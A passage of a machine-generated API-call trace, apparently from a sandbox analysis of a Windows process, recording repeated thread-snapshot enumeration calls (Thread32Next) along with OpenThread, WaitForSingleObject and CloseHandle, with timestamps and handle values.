(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.392] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.836] CloseHandle (hObject=0x17c) returned 1 [0184.836] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x127c) returned 0x17c [0184.836] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0216.039] CloseHandle (hObject=0x17c) returned 1 [0216.039] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0216.067] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.972] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0217.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.226] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.227] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 